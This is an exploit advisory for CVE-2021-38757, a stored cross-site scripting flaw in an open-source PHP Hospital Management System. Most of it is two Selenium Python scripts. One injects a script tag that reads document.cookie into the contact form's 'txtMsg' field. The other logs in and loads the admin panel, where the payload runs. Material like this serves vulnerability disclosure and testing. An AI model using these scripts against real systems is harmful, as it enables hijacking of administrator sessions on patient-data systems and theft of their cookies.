Authored by nu11secur1ty

Hospital Management System created by kishan0725 suffers from a persistent cross site scripting vulnerability.

advisories | CVE-2021-38757

# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter "txtMsg" on contact
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757

[+] Exploit Source:

### P0C

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757

from selenium import webdriver
import time
import os

#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"


browser = webdriver.Chrome()
browser.get((website_link))

try:
## The Exploit
browser.execute_script("document.querySelector('[name="txtName"]').value="User"")
browser.execute_script("document.querySelector('[name="txtEmail"]').value="
taratora@abv.bg"")
browser.execute_script("document.querySelector('[name="txtPhone"]').value="1234567890"")
browser.execute_script("document.querySelector('[name="txtPhone"]').value="1234567890"")
browser.execute_script("document.querySelector('[name="txtMsg"]').value="nu11secur1ty<script>alert(document.cookie)</script>"")

## submit the exploit
browser.execute_script("document.querySelector('[name="btnSubmit"]').click()")

# Check
os.system("python PoC-CVE-2021-38757-Check.py")

print("The payload for CVE CVE-2021-38757 is deployed...n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

### Ch3ck

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"

#enter your login username
username="tarator@abv.bg"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password2"
#enter the element for submit button
element_for_submit="patsub"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Check
time.sleep(3)
browser.maximize_window()
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))

print("The payload for CVE CVE-2021-38757 is deployed...n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty

RELATED ARTICLESMORE FROM AUTHOR